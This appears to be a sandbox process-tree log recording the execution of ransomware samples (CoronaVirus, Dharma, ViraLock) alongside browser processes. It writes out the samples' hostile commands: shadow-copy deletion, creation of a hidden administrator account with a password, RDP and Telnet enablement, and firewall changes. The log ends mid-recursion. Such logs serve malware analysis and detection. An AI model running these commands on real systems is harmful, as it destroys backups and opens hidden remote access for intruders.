  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11656 /prefetch:1
  2⤵
  PID:3960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11700 /prefetch:1
  2⤵
  PID:3596
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11996 /prefetch:1
  2⤵
  PID:3016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10588 /prefetch:1
  2⤵
  PID:3484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12160 /prefetch:1
  2⤵
  PID:3024
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12404 /prefetch:1
  2⤵
  PID:1328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12412 /prefetch:1
  2⤵
  PID:3376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12928 /prefetch:1
  2⤵
  PID:3860
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13968 /prefetch:1
  2⤵
  PID:6344
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12940 /prefetch:1
  2⤵
  PID:6412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12760 /prefetch:1
  2⤵
  PID:6840
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12908 /prefetch:1
  2⤵
  PID:6932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13828 /prefetch:1
  2⤵
  PID:7032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14176 /prefetch:1
  2⤵
  PID:6320
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14412 /prefetch:1
  2⤵
  PID:6556
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13288 /prefetch:1
  2⤵
  PID:6280
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10804 /prefetch:1
  2⤵
  PID:6292
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=13664 /prefetch:1
  2⤵
  PID:7116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10760 /prefetch:1
  2⤵
  PID:2180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
  2⤵
  PID:6364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14608 /prefetch:1
  2⤵
  PID:2936
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8084 /prefetch:8
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11492 /prefetch:8
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:6268
- C:\Users\Admin\Downloads\CoronaVirus.exe
  "C:\Users\Admin\Downloads\CoronaVirus.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  PID:6704
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:6760
  - - C:\Windows\system32\mode.com
      mode con cp select=1251
      4⤵
      PID:10744
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:28860
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe"
    3⤵
    PID:17616
  - - C:\Windows\system32\mode.com
      mode con cp select=1251
      4⤵
      PID:9640
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:9760
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
    3⤵
    PID:9356
- - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Info.hta"
    3⤵
    PID:9540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:11400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10920 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:18128
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:10396
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=14588 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:10776
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=13672 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:11048
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Executes dropped EXE
  PID:11336
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    PID:12060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:30080
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Suspicious behavior: LoadsDriver
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:32708
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:13724
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    PID:29452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    PID:29608
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      PID:31608
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:14232
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:29744
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:30092
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        
        PID:30204
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      PID:30328
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        
        PID:30368
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      System Location Discovery: System Language Discovery
      PID:30428
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:30512
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        
        PID:30572
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:30688
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        System Location Discovery: System Language Discovery
        
        PID:30764
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:30820
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        
        PID:30852
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      PID:30936
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:30980
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:31012
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:31092
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:31152
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      PID:31352
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      PID:31384
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        
        PID:31424
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:17056
- C:\Users\Admin\Downloads\Dharma.exe
  "C:\Users\Admin\Downloads\Dharma.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:18216
- - C:\Users\Admin\Downloads\ac\nc123.exe
    "C:\Users\Admin\Downloads\ac\nc123.exe"
    3⤵
    - Executes dropped EXE
    PID:17876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      4⤵
      PID:30508
- - C:\Users\Admin\Downloads\ac\mssql.exe
    "C:\Users\Admin\Downloads\ac\mssql.exe"
    3⤵
    - Sets service image path in registry
    - Executes dropped EXE
    - Impair Defenses: Safe Mode Boot
    - Suspicious behavior: LoadsDriver
    - Suspicious use of SetWindowsHookEx
    PID:32100
- - C:\Users\Admin\Downloads\ac\mssql2.exe
    "C:\Users\Admin\Downloads\ac\mssql2.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:720
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\Shadow.bat" "
    3⤵
    PID:31348
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\ac\systembackup.bat" "
    3⤵
    PID:30792
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value | Find "="
      4⤵
      PID:17648
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-544'" Get Name /Value
        5⤵
        
        PID:17636
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:17240
  - - C:\Windows\SysWOW64\net.exe
      net user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
      4⤵
      PID:11860
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 user systembackup Default3104 /add /active:"yes" /expires:"never" /passwordchg:"NO"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:19032
  - - C:\Windows\SysWOW64\net.exe
      net localgroup Administrators systembackup /add
      4⤵
      PID:29912
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators systembackup /add
        5⤵
        
        PID:32136
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value | Find "="
      4⤵
      PID:29048
    - - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        WMIC Group Where "SID = 'S-1-5-32-555'" Get Name /Value
        5⤵
        
        PID:14444
    - - C:\Windows\SysWOW64\find.exe
        
        Find "="
        5⤵
        
        PID:16404
  - - C:\Windows\SysWOW64\net.exe
      net localgroup "Remote Desktop Users" systembackup /add
      4⤵
      Remote Service Session Hijacking: RDP Hijacking
      PID:17748
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 localgroup "Remote Desktop Users" systembackup /add
        5⤵
        Remote Service Session Hijacking: RDP Hijacking
        
        PID:17676
  - - C:\Windows\SysWOW64\net.exe
      net accounts /forcelogoff:no /maxpwage:unlimited
      4⤵
      PID:3364
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 accounts /forcelogoff:no /maxpwage:unlimited
        5⤵
        
        PID:32692
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
      4⤵
      PID:29084
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:29056
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v systembackup /t REG_DWORD /d 0x0 /f
      4⤵
      Hide Artifacts: Hidden Users
      PID:30184
  - - C:\Windows\SysWOW64\attrib.exe
      attrib C:\users\systembackup +r +a +s +h
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:31056
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add portopening TCP 3389 "Remote Desktop"
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      System Location Discovery: System Language Discovery
      PID:30752
  - - C:\Windows\SysWOW64\sc.exe
      sc config tlntsvr start=auto
      4⤵
      Launches sc.exe
      System Location Discovery: System Language Discovery
      PID:12744
  - - C:\Windows\SysWOW64\net.exe
      net start Telnet
      4⤵
      PID:32216
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start Telnet
        5⤵
        
        PID:32604
- - C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe
    "C:\Users\Admin\Downloads\ac\EVER\SearchHost.exe"
    3⤵
    - Executes dropped EXE
    - Enumerates connected drives
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of SetWindowsHookEx
    PID:9672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9092 /prefetch:1
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:10212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=14696 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  PID:31072
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1896,1929352608339102107,11836230924688892845,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=13496 /prefetch:8
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:30396
- C:\Users\Admin\Downloads\ViraLock.exe
  "C:\Users\Admin\Downloads\ViraLock.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:29164
- - C:\Users\Admin\mskEQsAA\bIMsAwUc.exe
    "C:\Users\Admin\mskEQsAA\bIMsAwUc.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious behavior: GetForegroundWindowSpam
    PID:9792
  - - C:\Program Files (x86)\Internet Explorer\iexplore.exe
      "C:\Program Files (x86)\Internet Explorer\iexplore.exe" about:blank
      4⤵
      PID:9764
    - - C:\Program Files\Internet Explorer\IEXPLORE.EXE
        
        "C:\Program Files\Internet Explorer\IEXPLORE.EXE" about:blank
        5⤵
        Modifies Internet Explorer settings
        
        PID:9220
- - C:\ProgramData\vSEsoQgo\xCoIMcgw.exe
    "C:\ProgramData\vSEsoQgo\xCoIMcgw.exe"
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:28992
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:30244
  - - C:\Users\Admin\Downloads\ViraLock.exe
      C:\Users\Admin\Downloads\ViraLock
      4⤵
      Executes dropped EXE
      PID:16996
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:31836
      - C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        6⤵
        Executes dropped EXE
        
        PID:32520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        7⤵
        
        PID:18360
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        8⤵
        Executes dropped EXE
        
        PID:18588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        9⤵
        
        PID:29820
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        10⤵
        Executes dropped EXE
        
        PID:29520
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        11⤵
        
        PID:9432
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        12⤵
        Executes dropped EXE
        
        PID:11168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        13⤵
        System Location Discovery: System Language Discovery
        
        PID:16524
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        14⤵
        Executes dropped EXE
        
        PID:18840
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        15⤵
        
        PID:11784
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        16⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:30068
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        17⤵
        
        PID:29052
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
        C:\Users\Admin\Downloads\ViraLock
        18⤵
        Executes dropped EXE
        
        PID:12976
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\ViraLock"
        19⤵
        
        PID:16612
        
        C:\Users\Admin\Downloads\ViraLock.exe
        
